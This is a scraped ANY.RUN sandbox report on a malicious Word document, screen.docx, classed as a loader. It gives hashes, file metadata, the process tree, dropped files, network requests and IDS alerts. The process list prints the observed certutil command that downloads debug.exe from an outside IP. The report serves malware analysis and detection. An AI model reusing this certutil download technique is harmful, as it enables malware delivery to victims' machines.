analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

screen.docx

Full analysis: https://app.any.run/tasks/7f00e56d-97a2-4658-99c0-df020eb4a2eb
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 15:56:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

C1C9BCBBBCCE2AE5116CE82AEC4A6DC8

SHA1:

BDB6CB5CE58C92FE2E8173BB28498B647D836E43

SHA256:

B4D4DFEB086872500891AA875EB221E8FC95E0C4566A07BC8ADDA5BD19AB76F3

SSDEEP:

384:aWUBe9VTAt9f+7DRk8Ek0563j8v55nT7az6GNw6muveW83CrIQOqreA:aEk9p8Ek0Mjin/oNwDuL83CrxOpA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2936)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3792)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2936)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2936)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x24886c04
ZipCompressedSize: 373
ZipUncompressedSize: 1460
ZipFileName: [Content_Types].xml

XMP

Title: -
Subject: -
Creator: Dell_20170514745
Description: -

XML

Keywords: -
LastModifiedBy: Dell_20170514745
RevisionNumber: 2
CreateDate: 2019:05:19 09:58:00Z
ModifyDate: 2019:05:19 09:58:00Z
Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: 16
Characters: 93
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: 108
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\screen.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3792cmd /c ""C:\Users\admin\AppData\Local\Temp\info.bat" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2592certutil -urlcache -split -f http://137.59.18.154/debug.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2149122452
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 442
Read events
793
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE696.tmp.cvr
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\info.battext
MD5:CFAE91D51BA48F1AEC65D264D44AFADD
SHA256:1AC0E1EE22ACE54276054EA8333CCB34BBD5FC7E6E4ABA650AA4935A26870BDD
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$screen.docxpgc
MD5:65C2B54FCC06FCD501D42524CFE51BF0
SHA256:3DD78EA6FBC1B3AFC0D8CF4E4C5DBEF8674DB0B33264A86357B8B6A8E9235644
2592certutil.exeC:\Users\admin\AppData\Local\Temp\debug.exehtml
MD5:BF008299D141F2A37CA90ECB01A3A3FC
SHA256:F975DD912BBE0E390E4C9376088BA16BCF13C75FF65813523207FE576E6E437D
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\204E397D.emfemf
MD5:171C058BA5D717FE1B1BE999131E763D
SHA256:BCBEF5F2174727D5B3FB2B812BC759A5A4C5A41BDD7848FE78E4D263FA3D993E
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:816BEA007272E3D591722A84B2EBD2E8
SHA256:0BD48B965DD591F21A77D8C83E4C24FE5627C543192A698F7B1E1842A0EEDB5A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2592
certutil.exe
GET
404
137.59.18.154:80
http://137.59.18.154/debug.exe
HK
html
286 b
suspicious
2592
certutil.exe
GET
404
137.59.18.154:80
http://137.59.18.154/debug.exe
HK
html
286 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2592
certutil.exe
137.59.18.154:80
Xima Network
HK
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
2592
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2592
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2592
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
2 ETPRO signatures available at the full report
No debug info